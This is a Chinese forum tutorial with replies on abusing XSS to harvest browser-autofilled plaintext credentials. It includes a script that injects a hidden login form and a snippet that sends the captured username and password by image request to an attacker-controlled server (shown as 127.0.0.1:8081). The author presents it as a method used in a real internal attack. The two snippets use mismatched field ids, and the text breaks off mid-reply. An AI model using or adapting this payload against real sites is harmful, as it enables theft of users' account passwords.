利用XSS获取用户明文账户密码

挖低危的清风

1. 我们知道在浏览器存在这样一个功能，当用户登录成功了一个网页后，浏览器会提示我们是否保存密码。如果我们点击同意，那么浏览器就会将账户及密码进行保存。
2. 当我们退出账户再次访问登录页面的时候，我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。
   
3. 那么浏览器是如何识别到这个网页并自动填充好密码的呢，首先，浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网页中是否有当初我们保存账户及密码时的标签ID是否相同，如果都满足，那么浏览器就会在我们访问的时候，自动的将账户及密码填充进去。
   
4. 到这里，思路就清晰了，既然浏览器是通过域名加标签ID进行填充，那么如果我们能控制该域名下的标签ID，那么我们就有机会欺骗浏览器在我们控制的标签中填充进去账户及密码。所以我们只需要有一个XSS及可完成攻击。
5. 我们来假设一个场景，我们知道在内网中有一个系统是使用域账户进行登录的，且该系统存在XSS，我们应该如何获取到他的账户和密码。
6. 现在攻击成功的两个条件中我们已经满足了一个了，就是都在相同的domain下，下一步我们需要通过XSS创建一个form标签和两个input标签，并将ID设置为与登录框相同的ID。这两部完成我们就有几率获取到保存的明文账户及密码。
7. 现在我们来构建一下payload

   <script type="text/javascript">
   document.write("<div></div>")
   var form_1 = document.createElement("form");
   form_1.id = 'f_id';
   document.getElementsByTagName('div')[0].appendChild(form_1);
   document.getElementById('f_id').style.display='none';
   var name_1 = document.createElement("input");
   var pass_1 = document.createElement("input");
   name_1.type = "text";
   name_1.name = "username";
   name_1.id = "username"
   pass_1.type = "password";
   pass_1.name = "password";
   pass_1.id = "password";
   form_1.appendChild(name_1);
   form_1.appendChild(pass_1);
   </script>

8. 通过这种方式我们就创建了一个隐藏的form框
   
9. 这个时候我们通过xss 执行试一下效果。PS：具体实现，需要根据目标网页对代码进行微调
   因为目标站点不允许跨域JS，所以我们通过eval,atob进行xss攻击，首先进行base64编码
   
   然后构造相应的XSS代码

   一发xss payload 就被ichunqiu的waf,ban ip ,你们自己懂XSS如何构造吧？手动狗头！

10. 可以看到，成功插入了form框
    
11. 我们直接在console 查看是否填充了账户和密码，成功获取到了账户和密码。
    
12. 这个时候，我们就只需要添加JS代码让它 去自动获取账户和密码，然后发送到我们的服务器就可以了。使用setTimeout是为了让浏览器填充完毕才发送账户和密码。（截止今天Chrome似乎已经无法通过这种方式获取，Firefox目前任然可以。）

    setTimeout(function () {
    username = document.getElementById('login_username').value;
    password = document.getElementById('login_password').value;
    if (username.length > 0) {
      var newimg = new Image();
      newimg.src = 'http://127.0.0.1:8081/?username=' + username + '&password=' + password;
    }
    }, 2000);

13. 账户密码已成功接收。（这个是几个月前的一次内部攻击中利用到的攻击手法，当时几乎所有浏览器都受影响，现目前只测试了Chrome和Firefox，Chrome已不受影响。）
    

感谢作者大大的分享，刚刚我闲来没事自己复现了一下，有几个问题想请教一下您。
1、此方法貌似只能攻击浏览器上一个网站只保存一个账号密码，若是有多个账号密码保存，则无法使用此方法获取到明文账号密码。
2、文中所提及到的，以 “ID是否相同”来判断，我认为是有误的，部分表单是没有id属性的，但是仍然可以保存到浏览器的历史密码记录中，应该是以各属性名称进行判断的。
3、我对前端不太熟悉，不知道有没有document.getElementByClass('username').value;或者是getElementByName这样的操作？

熊哥 发表于 2020-6-8 16:51
感谢作者大大的分享，刚刚我闲来没事自己复现了一下，有几个问题想请教一下您。
1、此方法貌似只能攻击浏览 ...

1.多账户密码的我确实没试过，这种利用的前提是需要，浏览器主动向账户及密码框填充数据。只要浏览器能填充进去，那我们就有几率拿到账户及密码。
2. ID那个问题是表述有误，因为浏览器其实也需要一个标识来确定输入框，所以特征值肯定不止ID。属性名可能也是其中一点。
3.还有这种方式，但是必须指定一个from。通过from去获取其中input 的value。方式肯定不止这一两种，你可以去Google或者baidu看看。如何获取inpu